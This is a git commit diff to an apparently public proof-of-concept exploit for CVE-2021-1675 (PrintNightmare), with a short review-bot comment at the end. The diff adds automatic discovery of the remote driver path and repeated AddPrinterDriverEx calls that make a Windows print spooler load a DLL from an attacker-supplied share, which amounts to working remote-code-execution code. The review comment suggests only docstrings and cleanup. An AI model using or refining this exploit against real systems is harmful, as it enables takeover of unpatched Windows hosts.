Added dynamic pDriverPath, remember to update impacket

Signed-off-by: cube0x0 <vidfelt@protonmail.com>
cube0x0 3 years ago
parent 2f4b1def94
commit 3bad3016ac
  1. 63
      CVE-2021-1675.py
  2. BIN
      Images/poc.png

@ -2,9 +2,34 @@
from impacket.dcerpc.v5 import rprn from impacket.dcerpc.v5 import rprn
from impacket.dcerpc.v5 import transport from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.dtypes import NULL from impacket.dcerpc.v5.dtypes import NULL
from impacket.structure import Structure
import argparse import argparse
import sys import sys
import time import time
import pathlib
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
class DRIVER_INFO_2_BLOB(Structure):
structure = (
('cVersion','<L'),
('NameOffset', '<L'),
('EnvironmentOffset', '<L'),
('DriverPathOffset', '<L'),
('DataFileOffset', '<L'),
('ConfigFileOffset', '<L'),
)
def __init__(self, data = None):
Structure.__init__(self, data = data)
def fromString(self,data):
Structure.fromString(self, data)
self['ConfigFileArray'] = self.rawData[self['ConfigFileOffset']:self['DataFileOffset']].decode('utf-16-le')
self['DataFileArray'] = self.rawData[self['DataFileOffset']:self['DriverPathOffset']].decode('utf-16-le')
self['DriverPathArray'] = self.rawData[self['DriverPathOffset']:self['EnvironmentOffset']].decode('utf-16-le')
self['EnvironmentArray'] = self.rawData[self['EnvironmentOffset']:self['NameOffset']].decode('utf-16-le')
self['NameArray'] = self.rawData[self['NameOffset']:len(self.rawData)].decode('utf-16-le')
def connect(username, password, domain, lmhash, nthash, address, port): def connect(username, password, domain, lmhash, nthash, address, port):
binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address) binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address)
@ -29,10 +54,36 @@ def connect(username, password, domain, lmhash, nthash, address, port):
return dce return dce
def getDrivers(dce, handle=NULL):
#get drivers
resp = rprn.hRpcEnumPrinterDrivers(dce, pName=handle, pEnvironment="Windows x64\x00", Level=2)
data = b''.join(resp['pDrivers'])
#parse drivers
blob = DRIVER_INFO_2_BLOB()
blob.fromString(data)
#blob.dump()
return blob
def main(username, password, domain, lmhash, nthash, address, port, share): def main(username, password, domain, lmhash, nthash, address, port, share):
#connect #connect
dce = connect(username, password, domain, lmhash, nthash, address, port) dce = connect(username, password, domain, lmhash, nthash, address, port)
#handle = "\\\\{0}\x00".format(address)
handle = NULL
#find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
try:
blob = getDrivers(dce, handle)
pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
except Exception as e:
print('[-] Failed to enumerate remote pDriverPath')
print(str(e))
sys.exit(1)
print("[+] pDriverPath Found {0}".format(pDriverPath))
#build DRIVER_CONTAINER package #build DRIVER_CONTAINER package
container_info = rprn.DRIVER_CONTAINER() container_info = rprn.DRIVER_CONTAINER()
container_info['Level'] = 2 container_info['Level'] = 2
@ -40,21 +91,17 @@ def main(username, password, domain, lmhash, nthash, address, port, share):
container_info['DriverInfo']['Level2']['cVersion'] = 3 container_info['DriverInfo']['Level2']['cVersion'] = 3
container_info['DriverInfo']['Level2']['pName'] = "1234\x00" container_info['DriverInfo']['Level2']['pName'] = "1234\x00"
container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00" container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
container_info['DriverInfo']['Level2']['pDriverPath'] = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\x00" container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00'
container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share) container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share)
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00"
flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000 flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
#handle = "\\\\{0}\x00".format(address)
handle = NULL
filename = share.split("\\")[-1] filename = share.split("\\")[-1]
print("[*] Executing {0}".format(share))
print("[*] Uploading {0}".format(share))
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
print("[*] Stage0: {0}".format(resp['ErrorCode'])) print("[*] Stage0: {0}".format(resp['ErrorCode']))
for i in range(1, 50): for i in range(1, 30):
try: try:
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename) container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
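Review bot: DRIVER_INFO_2_BLOB.fromString in the first hunk states nothing about the layout it relies on: each slice runs from one offset to the next, so the parse is only valid when the server packs the strings in ascending offset order ConfigFile, DataFile, DriverPath, Environment, Name, and each decoded field presumably keeps its UTF-16 terminator because a slice ends at the next string's start rather than at the NUL — worth confirming against the MS-RPRN page linked above the class. A docstring should record that assumption, e.g. `"""Parse one DRIVER_INFO_2 entry; slice bounds assume the strings are packed in ascending ConfigFile..Name offset order (see MS-RPRN link above)."""`. getDrivers joins every returned entry but only the first header is parsed; a one-line comment such as `# only the first enumerated driver's header is parsed; rawData spans the whole buffer` would make that explicit. The commented-out `#blob.dump()` in getDrivers and the duplicated `#handle = "\\\\{0}\x00".format(address)` line in main should be removed rather than left as dead code; main continues past the end of the last hunk.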

